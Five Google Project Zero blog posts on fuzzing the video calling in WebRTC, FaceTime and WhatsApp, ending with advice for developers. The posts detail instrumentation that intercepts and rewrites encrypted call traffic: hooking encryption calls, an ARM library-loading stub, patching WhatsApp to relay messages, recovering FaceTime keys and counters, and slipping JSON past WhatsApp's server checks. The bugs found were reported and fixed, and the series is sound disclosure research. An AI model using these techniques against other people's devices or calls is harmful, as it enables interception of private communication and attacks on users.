Google Project Zero

Subscribe to Google Project Zero feed
News and updates from the Project Zero team at Googletavisohttp://www.blogger.com/profile/00625649251729449405noreply@blogger.comBlogger100125
Updated: 1 hour 50 min ago

Adventures in Video Conferencing Part 5: Where Do We Go from Here?

Thu, 12/13/2018 - 13:55
Posted by Natalie Silvanovich, Project Zero
Overall, our video conferencing research found a total of 11 bugs in WebRTC, FaceTime and WhatsApp. The majority of these were found through less than 15 minutes of mutation fuzzing RTP. We were surprised to find remote bugs so easily in code that is so widely distributed. There are several properties of video conferencing that likely led to the frequency and shallowness of these issues.WebRTC Bug ReportingWhen we started looking at WebRTC, we were surprised to discover that their website did not describe how to report vulnerabilities to the project. They had an open bug tracker, but no specific guidance on how to flag or report vulnerabilities. They also provided no security guidance for integrators, and there was no clear way for integrators to determine when they needed to update their source for security fixes. Many integrators seem to have branched WebRTC without consideration for applying security updates. The combination of these factors make it more likely that vulnerabilities did not get reported, vulnerabilities or fixes got ‘lost’ in the tracker, fixes regressed or fixes did not get applied to implementations that use the source in part.
We worked with the WebRTC team to add this guidance to the site, and to clarify their vulnerability reporting process. Despite these changes, several large software vendors reached out to our team with questions about how to fix the vulnerabilities we reported. This shows there is still a lack of clarity on how to fix vulnerabilities in WebRTC.Video Conferencing Test ToolsWe also discovered that most video conferencing solutions lack adequate test tools. In most implementations, there is no way to collect data that allows for problems with an RTP stream to be diagnosed. The vendors we asked did not have such a tool, even internally.  WebRTC had a mostly complete tool that allows streams to be recorded in the browser and replayed, but it did not work with streams that used non-default settings. This tool has now been updated to collect enough data to be able to replay any stream. The lack of tooling available to test RTP implementations likely contributed to the ease of finding vulnerabilities, and certainly made reproducing and reporting vulnerabilities more difficultVideo Conferencing StandardsThe standards that comprise video conferencing such as RTP, RTCP and FEC introduce a lot of complexity in achieving their goal of enabling reliable audio and video streams across any type of connection. While the majority of this complexity provides value to the end user, it also means that it is inherently difficult to implement securely. The Scope of Video ConferencingWebRTC has billions of users. While it was originally created for use in the Chrome browser, it is now integrated by at least two Android applications that eclipse Chrome in terms of users: Facebook and WhatsApp (which only uses part of WebRTC). It is also used by Firefox and Safari. It is likely that most mobile devices run multiple copies of the WebRTC library. The ubiquity of WebRTC coupled with the lack of a clear patch strategy make it an especially concerning target for attackers.Recommendations for DevelopersThis section contains recommendations for developers who are implementing video conferencing based on our observations from this research.
First, it is a good idea to use an existing solution for video conferencing (either WebRTC or PJSIP) as opposed to implementing a new one. Video conferencing is very complex, and every implementation we looked at had vulnerabilities, so it is unlikely a new implementation would avoid these problems. Existing solutions have undergone at least some security testing and would likely have fewer problems.
It is also advisable to avoid branching existing video conferencing code. We have received questions from vendors who have branched WebRTC, and it is clear that this makes patching vulnerabilities more difficult. While branching can solve problems in the short term, integrators often regret it in the long term.
It is important to have a patch strategy when implementing video conferencing, as there will inevitably be vulnerabilities found in any implementation that is used. Developers should understand how security patches are distributed for any third-party library they integrate, and have a plan for applying them as soon as they are available.
It is also important to have adequate test tools for a video conferencing application, even if a third-party implementation is used. It is a good idea to have a way to reproduce a call from end to end. This is useful in diagnosing crashes, which could have a security impact, as well as functional problems.
Several mobile applications we looked at had unnecessary attack surface. Specifically codecs and other features of the video conferencing implementation were enabled and accessible via RTP even though no legitimate call would ever use them. WebRTC and PJSIP support disabling specific features such as codecs and FEC. It is a good idea to disable the features that are not being used.
Finally, video conferencing vulnerabilities can generally be split into those that require the target to answer the incoming call, and those that do not. Vulnerabilities that do not require the call to be answered are more dangerous. We observed that some video conferencing applications perform much more parsing of untrusted data before a call is answered than others. We recommend that developers put as much functionality after the call is answered as possible.Tools
In order to open up the most popular video conferencing implementations to more security research, we are releasing the tools we developed to do this research. Street Party is a suite of tools that allows the RTP streams of video conferencing implementations to be viewed and modified. It includes:
  • WebRTC: instructions for recording and replaying RTP packets using WebRTC’s existing tools
  • FaceTime: hooks for recording and replaying FaceTime calls
  • WhatsApp: hooks for recording and replaying WhatsApp calls on Android

We hope these tools encourage even more investigation into the security properties of video conferencing. Contributions are welcome.Conclusion
We reviewed WebRTC, FaceTime and WhatsApp and found 11 serious vulnerabilities in their video conferencing implementations. Accessing and altering their encrypted content streams required substantial tooling. We are releasing this tooling to enable additional security research on these targets. There are many properties of video conferencing that make it susceptible to vulnerabilities. Adequate testing, conservative design and frequent patching can reduce the security risk of video conferencing implementations.
Categories: Security

Adventures in Video Conferencing Part 4: What Didn't Work Out with WhatsApp

Wed, 12/12/2018 - 13:54
Posted by Natalie Silvanovich, Project Zero
Not every attempt to find bugs is successful. When looking at WhatsApp, we spent a lot of time reviewing call signalling hoping to find a remote, interaction-less vulnerability. No such bugs were found. We are sharing our work with the hopes of saving other researchers the time it took to go down this very long road. Or maybe it will give others ideas for vulnerabilities we didn’t find.
As discussed in Part 1, signalling is the process through which video conferencing peers initiate a call. Usually, at least part of signalling occurs before the receiving peer answers the call. This means that if there is a vulnerability in the code that processes incoming signals before the call is answered, it does not require any user interaction.
WhatsApp implements signalling using a series of WhatsApp messages. Opening libwhatsapp.so in IDA, there are several native calls that handle incoming signalling messages.
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferJava_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAckJava_com_whatsapp_voipcalling_Voip_nativeHandleCallGroupInfoJava_com_whatsapp_voipcalling_Voip_nativeHandleCallRekeyRequestJava_com_whatsapp_voipcalling_Voip_nativeHandleCallFlowControlJava_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferReceiptJava_com_whatsapp_voipcalling_Voip_nativeHandleCallAcceptReceiptJava_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAcceptJava_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferPreAcceptJava_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChangedJava_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChangedAckJava_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferRejectJava_com_whatsapp_voipcalling_Voip_nativeHandleCallTerminateJava_com_whatsapp_voipcalling_Voip_nativeHandleCallTransportJava_com_whatsapp_voipcalling_Voip_nativeHandleCallRelayLatencyJava_com_whatsapp_voipcalling_Voip_nativeHandleCallRelayElectionJava_com_whatsapp_voipcalling_Voip_nativeHandleCallInterruptedJava_com_whatsapp_voipcalling_Voip_nativeHandleCallMutedJava_com_whatsapp_voipcalling_Voip_nativeHandleWebClientMessage
Using apktool to extract the WhatsApp APK, it appears these natives are called from a loop in the com.whatsapp.voipcalling.Voip class. Looking at the smali, it looks like signalling messages are sent as WhatsApp messages via the WhatsApp server, and this loop handles the incoming messages.
Immediately, I noticed that there was a peer-to-peer encrypted portion of the message (the rest of the message is only encrypted peer-to-server). I thought this had the highest potential of reaching bugs, as the server would not be able to sanitize the data. In order to be able to read and alter encrypted packets, I set up a remote server with a python script that opens a socket. Whenever this socket receives data, the data is displayed on the screen, and I have the option of either sending the unaltered packet or altering the packet before it is sent. I then looked for the point in the WhatsApp smali where messages are peer-to-peer encrypted.
Since WhatsApp uses libsignal for peer-to-peer encryption, I was able to find where messages are encrypted by matching log entries. I then added smali code that sends a packet with the bytes of the message to the server I set up, and then replaces it with the bytes the server returns (changing the size of the byte array if necessary). This allowed me to view and alter the peer-to-peer encrypted message. Making a call using this modified APK, I discovered that the peer-to-peer message was always exactly 24 bytes long, and appeared to be random. I suspected that this was the encryption key used by the call, and confirmed this by looking at the smali.
A single encryption key doesn’t have a lot of potential for malformed data to lead to bugs (I tried lengthening and shortening it to be safe, but got nothing but unexploitable null pointer issues), so I moved on to looking at the peer-to-server encrypted messages. Looking at the Voip loop in smali, it looked like the general flow is that the device receives an incoming message, it is deserialized and if it is of the right type, it is forwarded to the messaging loop. Then certain properties are read from the message, and it is forwarded to a processing function based on its type. Then the processing function reads even more properties, and calls one of the above native methods with the properties as its parameters. Most of these functions have more than 20 parameters.
Many of these functions perform logging when they are called, so by making a test call, I could figure out which functions get called before a call is picked up. It turns out that during a normal incoming call, the device only receives an offer and calls Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer, and then spawns the incoming call screen in WhatsApp. All the other signal types are not used until the call is picked up.
An immediate question I had was whether other signal types are processed if they are received before a call is picked up. Just because the initiating device never sends these signal types before the call is picked up doesn’t mean the receiving device wouldn’t process them if it received them.
Looking through the APK smali, I found the class com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback that has several methods like sendOffer and sendAccept that appeared to send the messages that are processed by these native calls. I changed sendOffer to call other send methods, like sendAccept instead of its normal messaging functionality. Trying this, I discovered that the Voip loop will process any signal type regardless of whether the call has been answered. The native methods will then parse the parameters, process them and put the results in a buffer, and then call a single method to process the buffer. It is only at that point processing will stop if the message is of the wrong type.I then reviewed all of the above methods in IDA. The code was very conservatively written, and most needed checks were performed. However, there were a few areas that potentially had bugs that I wanted to investigate more. I decided that changing the parameters to calls in the com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback was too slow to test the number of cases I wanted to test, and went looking for another way to alter the messages.
Ideally, I wanted a way to pass peer-to-server encrypted messages to my server before they were sent, so I could view and alter them. I went through the WhatsApp APK smali looking for a point after serialization but before encryption where I could add my smali function that sends and alters the packets. This was fairly difficult and time consuming, and I eventually put my smali in every method that wrote to a non-file ByteArrayOutputStream in the com.whatsapp.protocol and com.whatsapp.messaging packages (about 10 total) and looked for where it got called. I figured out where it got called, and fixed the class so that anywhere a byte array was written out from a stream, it got sent to my server, and removed the other calls. (If you’re following along at home, the smali file I changed included the string “Double byte dictionary token out of range”, and the two methods I changed contained calls to toByteArray, and ended with invoking a protocol interface.) Looking at what got sent to my server, it seemed like a reasonably comprehensive collection of WhatsApp messages, and the signalling messages contained what I thought they would.
WhatsApp messages are in a compressed XMPP format. A lot of parsers have been written for reverse engineering this protocol, but I found the whatsapp-reveng parser worked the best. I did have to replace the tokens in whatsapp_defines.py with a list extracted from the APK for it to work correctly though. This made it easier to figure out what was in each packet sent to the server.
Playing with this a bit, I discovered that there are three types of checks in WhatsApp signalling messages. First, the server validates and modifies incoming signalling messages. Secondly, the messages are deserialized, and this can cause errors if the format is incorrect, and generally limits the contents of the Java message object that is passed on. Finally, the native methods perform checks on their parameters.
These additional checks prevented several of the areas I thought were problems from actually being problems. For example, there is a function called by Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer that takes in an array of byte arrays, an array of integers and an array of booleans. It uses these values to construct candidates for the call. It checks that the array of byte arrays and the array of integers are of the same length before it loops through them, using values from each, but it does not perform the same check on the boolean array. I thought that this could go out of bounds, but it turns out that the integer and booleans are serialized as a vector of <int,bool> pairs, and the arrays are then copied from the vector, so it is not actually possible to send arrays with different lengths.
One area of the signalling messages that looked especially concerning was the voip_options field of the message. This field is never sent from the sending device, but is added to the message by the server before it is forwarded to the receiving device. It is a buffer in JSON format that is processed by the receiving device and contains dozens of configuration parameters.
{"aec":{"offset":"0","mode":"2","echo_detector_mode":"4","echo_detector_impl":"2","ec_threshold":"50","ec_off_threshold":"40","disable_agc":"1","algorithm":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"aecm_adapt_step_size":"2"},"agc":{"mode":"0","limiterenable":"1","compressiongain":"9","targetlevel":"1"},"bwe":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"encode":{"complexity":"5","cbr":"0"},"init_bwe":{"use_local_probing_rx_bitrate":"1","test_flags":"982188032","max_tx_rott_based_bitrate":"128000","max_bytes":"8000","max_bitrate":"350000"},"ns":{"mode":"1"},"options":{"connecting_tone_desc": "test","video_codec_priority":"2","transport_stats_p2p_threshold":"0.5","spam_call_threshold_seconds":"55","mtu_size":"1200","media_pipeline_setup_wait_threshold_in_msec":"1500","low_battery_notify_threshold":"5","ip_config":"1","enc_fps_over_capture_fps_threshold":"1","enable_ssrc_demux":"1","enable_preaccept_received_update":"1","enable_periodical_aud_rr_processing":"1","enable_new_transport_stats":"1","enable_group_call":"1","enable_camera_abtest_texture_preview":"1","enable_audio_video_switch":"1","caller_end_call_threshold":"1500","call_start_delay":"1200","audio_encode_offload":"1","android_call_connected_toast":"1"}Sample voip_options (truncated)
If a peer could send a voip_options parameter to another peer, it would open up a lot of attack surface, including a JSON parser and the processing of these parameters. Since this parameter almost always appears in an offer, I tried modifying an offer to contain one, but the offer was rejected by the WhatsApp server with error 403. Looking at the binary, there were three other signal types in the incoming call flow that could accept a voip_options parameter. Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAccept and Java_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChanged were accepted by the server if a voip_options parameter was included, but it was stripped before the message was sent to the peer. However, if a voip_options parameter was attached to a Java_com_whatsapp_voipcalling_Voip_nativeHandleCallGroupInfo message, it would be forwarded to the peer device. I confirmed this by sending malformed JSON looking at the log of the receiving device for an error.
The voip_options parameter is processed by WhatsApp in three stages. First, the JSON is parsed into a tree. Then the tree is transformed to a map, so JSON object properties can be looked up efficiently even though there are dozens of them. Finally, WhatsApp goes through the map, looking for specific parameters and processes them, usually copying them to an area in memory where they will set a value relevant to the call being made.
Starting off with the JSON parser, it was clearly the PJSIP JSON parser. I compiled the code and fuzzed it, and only found one minor out-of-bounds read issue.
I then looked at the conversion of the JSON tree output from the parser into the map. The map is a very efficient structure. It is a hash map that uses FarmHash as its hashing algorithm, and it is designed so that the entire map is stored in a single slab of memory, even if the JSON objects are deeply nested. I looked at many open source projects that contained similar structures, but could not find one that looked similar. I looked through the creation of this structure in great detail, looking especially for type confusion bugs as well as errors when the memory slab is expanded, but did not find any issues.
I also looked at the functions that go through the map and handle specific parameters. These functions are extremely long, and I suspect they are generated using a code generation tool such as bison. They mostly copy parameters into static areas of memory, at which point they become difficult to trace. I did not find any bugs in this area either. Other than going through parameter names and looking for value that seemed likely to cause problems, I did not do any analysis of how the values fetched from JSON are actually used. One parameter that seemed especially promising was an A/B test parameter called setup_video_stream_before_accept. I hoped that setting this would allow the device to accept RTP before the call is answered, which would make RTP bugs interaction-less, but I was unable to get this to work.
In the process of looking at this code, it became difficult to verify its functionality without the ability to debug it. Since WhatsApp ships an x86 library for Android, I wondered if it would be possible to run the JSON parser on Linux.
Tavis Ormandy created a tool that can load the libwhatsapp.so library on Linux and run native functions, so long as they do not have a dependency on the JVM. It works by patching the .dynamic ELF section to remove unnecessary dependencies by replacing DT_NEEDED tags with DT_DEBUG tags. We also needed to remove constructors and deconstructors by changing the DT_FINI_ARRAYSZ and DT_INIT_ARRAYSZ to zero. With these changs in place, we could load the library using dlopen() and use dlsym() and dlclose() as normal.
Using this tool, I was able to look at the JSON parsing in more detail. I also set up distributed fuzzing of the JSON binary. Unfortunately, it did not uncover any bugs either.
Overall, WhatsApp signalling seemed like a promising attack surface, but we did not find any vulnerabilities in it. There were two areas where we were able to extend the attack surface beyond what is used in the basic call flow. First, it was possible to send signalling messages that should only be sent after a call is answered before the call is answered, and they were processed by the receiving device. Second, it was possible for a peer to send voip_options JSON to another device. WhatsApp could reduce the attack surface of signalling by removing these capabilities.
I made these suggestions to WhatsApp, and they responded that they were already aware of the first issue as well as variants of the second issue. They said they were in the process of limiting what signalling messages can be processed by the device before a call is answered. They had already fixed other issues where a peer can send voip_options JSON to another peer, and fixed the method I reported as well. They said they are also considering adding cryptographic signing to the voip_options parameter so a device can verify it came from the server to further avoid issues like this. We appreciate their quick resolution of the voip_options issue and strong interest in implementing defense-in-depth measures.
In Part 5, we will discuss the conclusions of our research and make recommendations for better securing video conferencing.
Categories: Security

Adventures in Video Conferencing Part 3: The Even Wilder World of WhatsApp

Tue, 12/11/2018 - 12:42
Posted by Natalie Silvanovich, Project Zero
WhatsApp is another application that supports video conferencing that does not use WebRTC as its core implementation. Instead, it uses PJSIP, which contains some WebRTC code, but also contains a substantial amount of other code, and predates the WebRTC project. I fuzzed this implementation to see if it had similar results to WebRTC and FaceTime.Fuzzing Set-upPJSIP is open source, so it was easy to identify the PJSIP code in the Android WhatsApp binary (libwhatsapp.so). Since PJSIP uses the open source library libsrtp, I started off by opening the binary in IDA and searching for the string srtp_protect, the name of the function libsrtp uses for encryption. This led to a log entry emitted by a function that looked like srtp_protect. There was only one function in the binary that called this function, and called memcpy soon before the call. Some log entries before the call contained the file name srtp_transport.c, which exists in the PJSIP repository. The log entries in the WhatsApp binary say that the function being called is transport_send_rtp2 and the PJSIP source only has a function called transport_send_rtp, but it looks similar to the function calling srtp_protect in WhatsApp, in that it has the same number of calls before and after the memcpy. Assuming that the code in WhatsApp is some variation of that code, the memcpy copies the entire unencrypted packet right before it is encrypted.
Hooking this memcpy seemed like a possible way to fuzz WhatsApp video calling. I started off by hooking memcpy for the entire app using a tool called Frida. This tool can easily hook native function in Android applications, and I was able to see calls to memcpy from WhatsApp within minutes. Unfortunately though, video conferencing is very performance sensitive, and a delay sending video packets actually influences the contents of the next packet, so hooking every memcpy call didn’t seem practical. Instead, I decided to change the single memcpy to point to a function I wrote.
I started off by writing a function in assembly that loaded a library from the filesystem using dlopen, retrieved a symbol by calling dlsym and then called into the library. Frida was very useful in debugging this, as it could hook calls to dlopen and dlsym to make sure they were being called correctly. I overwrote a function in the WhatsApp GIF transcoder with this function, as it is only used in sending text messages, which I didn’t plan to do with this altered version. I then set the memcpy call to point to this function instead of memcpy, using this online ARM branch finder.
sub_2F8CCMOV             X21, X30MOV             X22, X0MOV             X23, X1MOV             X20, X2MOV             X1, #1ADRP            X0, #aDataDataCom_wh@PAGE ; "/data/data/com.whatsapp/libn.so"ADD             X0, X0, #aDataDataCom_wh@PAGEOFF ; "/data/data/com.whatsapp/libn.so"BL              .dlopenADRP            X1, #aApthread@PAGE ; "apthread"ADD             X1, X1, #aApthread@PAGEOFF ; "apthread"BL              .dlsymMOV             X8, X0MOV             X0, X22MOV             X1, X23MOV             X2, X20NOPBLR             X8MOV             X30, X21RETThe library loading function
I then wrote a library for Android which had the same parameters as memcpy, but fuzzed and copied the buffer instead of just copying it, and put it on the filesystem where it would be loaded by dlopen. I then tried making a WhatsApp call with this setup. The video call looked like it was being fuzzed and crashed in roughly fifteen minutes.Replay Set-up
To replay the packets I added logging to the library, so that each buffer that was altered would also be saved to a file. Then I created a second library that copied the logged packets into the buffer being copied instead of altering it. This required modifying the WhatsApp binary slightly, because the logged packet will usually not be the same size as the packet currently being sent. I changed the length of the hooked memcpy to be passed by reference instead of by value, and then had the library change the length to the length of the logged packet. This changed the value of the length so that it would be correct for the call to srtp_protect. Luckily, the buffer that the packet is copied into is a fixed length, so there is no concern that a valid packet will overflow the buffer length. This is a common design pattern in RTP processing that improves performance by reducing length checks. It was also helpful in modifying FaceTime to replay packets of varying length, as described in the previous post.
This initial replay setup did not work, and looking at the logged packets, it turned out that WhatsApp uses four streams with different SSRCs for video conferencing (possibly one for video, one for audio, one for synchronization and one for good luck). The streams each had only one payload type, and they were all different, so it was fairly easy to map each SSRC to its stream. So I modified the replay library to determine the current SSRC for each stream based on the payload types of incoming packets, and then to replace the SSRC of the replayed packets with the correct one based on their payload type. This reliably replayed a WhatsApp call. I was then able to fuzz and reproduce crashes on WhatsApp.ResultsUsing this setup, I reported one heap corruption issue on WhatsApp, CVE-2018-6344. This issue has since been fixed. After this issue was resolved, fuzzing did not yield any additional crashes with security impact, and we moved on to other methodologies. Part 4 will describe our other (unsuccessful) attempts to find vulnerabilities in WhatsApp.
Categories: Security

Adventures in Video Conferencing Part 2: Fun with FaceTime

Wed, 12/05/2018 - 13:43
Posted by Natalie Silvanovich, Project Zero
FaceTime is Apple’s video conferencing application for iOS and Mac. It is closed source, and does not appear to use any third-party libraries for its core functionality. I wondered whether fuzzing the contents of FaceTime’s audio and video streams would lead to similar results as WebRTC.Fuzzing Set-up
Philipp Hancke performed an excellent analysis of FaceTime’s architecture in 2015. It is similar to WebRTC, in that it exchanges signalling information in SDP format and then uses RTP for audio and video streams. Looking at the FaceTime implementation on a Mac, it seemed the bulk of the calling functionality of FaceTime is in a daemon called avconferenced. Opening up the binary that supports its functionality, AVConference in IDA, it contains a function called SRTPEncryptData. This function then calls CCCryptorUpdate, which appeared to encrypt RTP packets below the header.
To do a quick test of whether fuzzing was likely to be effective, I hooked this function and altered the underlying encrypted data. Normally, this can be done by setting the DYLD_INSERT_LIBRARIES environment variable, but since avconferenced is a daemon that restarts automatically when it dies, there wasn’t an easy way to set an environment variable. I eventually used insert_dylib to alter the AVConference binary to load a library on startup, and restarted the process. The library loaded used DYLD_INTERPOSE to replace CCCryptorUpdate with a version that fuzzed every input buffer (using fuzzer q from Part 1) before it was processed. This implementation had a lot of problems: it fuzzed both encryption and decryption, it affected every call to CCCryptorUpdate from avconferenced, not just ones involved in SRTP and there was no way to reproduce a crash. But using the modified FaceTime to call an iPhone led to video output that looked corrupted, and the phone crashed in a few minutes. This confirmed that this function was indeed where FaceTime calls are encrypted, and that fuzzing was likely to find bugs.
I made a few changes to the function that hooked CCCryptorUpdate to attempt to solve these problems. I limited fuzzing the input buffer to the two threads that write audio and video output to RTP, which also solved the problem of decrypted packets being fuzzed, as these threads only ever encrypt. I then added functionality that wrote the encrypted, fuzzed contents of each packet to a series of log files, so that test cases could be replayed. This required altering the sandbox of avconferenced so that it could write files to the log location, and adding spinlocks to the hook, as calling CCCryptorUpdate is thread safe, but logging packets isn’t. Call Replay
I then wrote a second library that hooks CCCryptorUpdate and replays packets logged by the first library by copying the logged packets in sequence into the packet buffers passed into the function. Unfortunately, this required a small modification to the AVConference binary, as the SRTPEncryptData function does not respect the length returned by CCCryptorUpdate; instead, it assumes that the length of the encrypted data is the same as the length as the plaintext data, which is reasonable when CCCryptorUpdate isn’t being hooked. Since SRTPEncryptData always uses a large fixed-size buffer for encryption, and encryption is in-place, I changed the function to retrieve the length of the encrypted buffer from the very end of the buffer, which was set in the hooked CCCryptorUpdate call. This memory is unlikely to be used for other purposes due to the typical shorter length of RTP packets. Unfortunately though, even though the same encrypted data was being replayed to the target, it wasn’t being processed correctly by the receiving device.
To understand why requires an explanation of how RTP works. An RTP packet has the following format.

It contains several fields that impact how its payload is interpreted. The SSRC is a random identifier that identifies a stream. For example, in FaceTime the audio and video streams have different SSRCs. SSRCs can also help differentiate between streams in a situation where a user could potentially have an unlimited number of streams, for example, multiple participants in a video call. RTP packets also have a payload type (PT in the diagram) which is used to differentiate different types of data in the payload. The payload type for a certain data type is consistent across calls. In FaceTime, the video stream has a single payload type for video data, but the audio stream has two payload types, likely one for audio data and the other for synchronization. The marker (M in the diagram) field of RTP is also used by FaceTime to represent when a packet is fragmented, and needs to be reassembled.
From this it is clear that simply copying logged data into the current encrypted packet won’t function correctly, because the data needs to have the correct SSRC, payload type and marker, or it won’t be interpreted correctly. This wasn’t necessary in WebRTC, because I had enough control over WebRTC that I could create a connection with a single SSRC and payload type for fuzzing purposes. But there is no way to do this in FaceTime, even muting a video call leads to silent audio packets being sent as opposed to the audio stream shutting down. So these values needed to be manually corrected.
An RTP feature called extensions made correcting these fields difficult. An extension is an optional header that can be added to an RTP packet. Extensions are not supposed to depend on the RTP payload to be interpreted, and extensions are often used to transmit network or display features. Some examples of supported extensions include the orientation extension, which tells the endpoint the orientation of the receiving device and the mute extension, which tells the endpoint whether the receiving device is muted.
Extensions mean that even if it is possible to determine the payload type, marker and SSRC of data, this is not sufficient to replay the exact packet that was sent. Moreover, FaceTime creates extensions after the packet is encrypted, so it is not possible to create the complete RTP packet by hooking CCCryptorUpdate, because extensions could be added later.
At this point, it seemed necessary to hook sendmsg as well as CCCryptorUpdate. This would allow the outgoing RTP header to be modified once it is complete. There were a few challenges in doing this. To start, audio and video packets are sent by different threads in FaceTime, and can be reordered between the time they are encrypted and the time they are sent by sendmsg. So I couldn’t assume that if sendmsg received an RTP packet that it was necessarily the last one that was encrypted. There was also the problem that SSRCs are dynamic, so replaying an RTP packet with the same SSRC it is recorded with won’t work, it needs to have the new SSRC for the audio or video stream.
Note that in MacOS Mojave, FaceTime can call sendmsg via either the AVConference binary or the IDSFoundation binary, depending on the network configuration. So to capture and replay unencrypted RTP traffic on newer systems, it is necessary  to hook CCCryptorUpdate in AConference and sendmsg in IDSFoundation (AVConference calls into IDSFoundation when it calls sendmsg). Otherwise, the process is the same as on older systems.
I ended up implementing a solution that recorded packets by recording the unencrypted payload, and then recorded its RTP header, and using a snippet of the encrypted payload to pair headers with the correct unencrypted payload. Then to replay packets, the packets encrypted in CCCryptorUpdate were replaced with the logged packets, and once the encrypted payload came through to sendmsg, the header was replaced with the logged one for that payload. Fortunately, the two streams with unique SSRCs used by FaceTime do not share any payload types, so it was possible to determine the new SSRC for each stream by waiting for an incoming packet with the correct payload type. Then in each subsequent packet, the SSRC was replaced with the correct one.
Unfortunately, this still did not replay a FaceTime call correctly, and calls often experienced decryption failures. I eventually determined that audio and video on FaceTime are encrypted with different keys, and updated the replay script to queue the CCCryptor used by CCCryptorUpdate function based on whether it was audio or video content. Then in sendmsg, the entire logged RTP packet, including the unencrypted payload, was copied into the outgoing packet, the SSRC was fixed, and then the payload encrypted with the next CCCryptor out of the appropriate queue. If a CCCryptor wasn’t available, outgoing packets were dropped until a new one was created. At this point, it was possible to stop using the modified AVConference binary, as all the packet modification was now happening in sendmsg. This implementation still had reliability problems.
Digging more deeply into how FaceTime encryption works, packets are encrypted in CTS mode, which requires a counter. The counter is initialized to a unique value for each packet that is sent. During the initialization of the RTP stream, the peers exchange two 16-byte random tokens, one for audio and one for video. The counter value for each packet is then calculated by exclusive or-ing the token with several values found in the packet, including the SSRC and the sequence number. Only one value in this calculation, the sequence number, changes between each packet. So it is possible to calculate the counter value for each packet by knowing the initial counter value and sequence number, which can be retrieved by hooking CCCryptorCreateWithMode. The sequence number is xor-ed with the random token at index 0x12 when FaceTime constructs a counter, so by xor-ing this location with the initial sequence number and then a packet’s sequence number, the counter value for that packet can be calculated. The key can also be retrieved by hooking CCCryptorCreateWithMode.This allowed me to dispense with queuing cryptors, as I now had all the information I needed to construct a cryptor for any packet. This allowed for packets to be encrypted faster and more accurately.
Sequence numbers still posed a problem though, as the initial sequence number of an RTP stream is randomly generated at the beginning of the call, and is different between subsequent calls. Also, sequence numbers are used to reconstruct video streams in order, so they need to be correct. I altered the replay tool determine the starting sequence number of each stream, and then calculate the difference between the starting sequence number of each logged stream and the sequence number of the logged packet and then add it to this value. These two changes finally made the replay tool work, though replay gets slower and slower as a stream is replayed due to dropped packets.   
Results
Using this setup, I was able to fuzz FaceTime calls and reproduce the crashes. I reported three bugs in FaceTime based on this work. All these issues have been fixed in recent updates.
CVE-2018-4366 is an out-of-bounds read in video processing that occurs on Macs only.
CVE-2018-4367 is a stack corruption vulnerability that affects iOS and Mac. There are a fair number of variables on the stack of the affected function before the stack cookie, and several fuzz crashes due to this issue caused segmentation faults as opposed to stack_chk crashes, so it is likely exploitable.
CVE-2018-4384 is a kernel heap corruption issue in video processing that affects iOS. It is likely similar to this vulnerability found by Adam Donenfeld of Zimperium.
All of these issues took less than 15 minutes of fuzzing to find on a live device. Unfortunately, this was the limit of fuzzing that could be performed on FaceTime, as it would be difficult to create a command line fuzzing tool with coverage like we did for WebRTC as it is closed source.
In Part 3, we will look at video calling in WhatsApp.
Categories: Security

Adventures in Video Conferencing Part 1: The Wild World of WebRTC

Tue, 12/04/2018 - 14:40
Posted by Natalie Silvanovich, Project Zero
Over the past five years, video conferencing support in websites and applications has exploded. Facebook, WhatsApp, FaceTime and Signal are just a few of the many ways that users can make audio and video calls across networks. While a lot of research has been done into the cryptographic and privacy properties of video conferencing, there is limited information available about the attack surface of these platforms and their susceptibility to vulnerabilities. We reviewed the three most widely-used video conferencing implementations. In this series of blog posts, we describe what we found.
This part will discuss our analysis of WebRTC. Part 2 will cover our analysis of FaceTime. Part 3 will discuss how we fuzzed WhatsApp. Part 4 will describe some attacks against WhatsApp that didn’t work out. And finally, Part 5 will discuss the future of video conferencing and steps that  developers can take to improve the security of their implementation.Typical Video Conferencing Architecture
All the video conferencing implementations we investigated allow at least two peers anywhere on the Internet to communicate through audiovisual streams. Implementing this capability so that it is reliable and has good audio and video quality presents several challenges. First, the peers need to be able to find each other and establish a connection regardless of NATs or other network infrastructure. Then they need to be able to communicate, even though they could be on different platforms, application versions or browsers. Finally, they need to maintain audio and video quality, even if the connection is low-bandwidth or noisy.
Almost all video conferencing solutions have converged on a single architecture. It assumes that two peers can communicate via a secure, integrity checked channel which may have low bandwidth or involve an intermediary server, and it allows them to create a faster, higher-bandwidth peer-to-peer channel.
The first stage in creating a connection is called signalling. It is the process through which the two peers exchange the information they will need to create a connection, including network addresses, supported codecs and cryptographic keys. Usually, the calling peer sends a call request including information about itself to the receiving peer, and then the receiving peer responds with similar information. SDP is a common protocol for exchanging this information, but it is not always used, and most implementations do not conform to the specification. It is common for mobile messaging apps to send this information in a specially formatted message, sent through the same channel text messages are sent. Websites that support video conferencing often use WebSockets to exchange information, or exchange it via HTTPS using the webserver as an intermediary.
Once signalling is complete, the peers find a way to route traffic to each other using the STUN, TURN and ICE protocols. Based on what these protocols determine, the peers can create UDP, UDP-over-STUN and occasionally TCP connections based of what is favorable for the network conditions.
Once the connection has been made, the peers communicate using Real-time Transport Protocol. Though this protocol is standardized, most implementations deviate somewhat from the standard. RTP can be encrypted using a protocol called Secure RTP (SRTP), and some implementations also encrypt streams using DTLS. Under the encryption envelope, RTP supports features that allow multiple streams and formats of data to be exchanged simultaneously. Then, based on how RTP classifies the data, it is passed on to other processing, such as video codecs.  Stream Control Transmission Protocol (SCTP) is also sometimes used to exchange small amounts of data (for example a text message on top of a call) during video conferencing, but it is less commonly used than RTP.
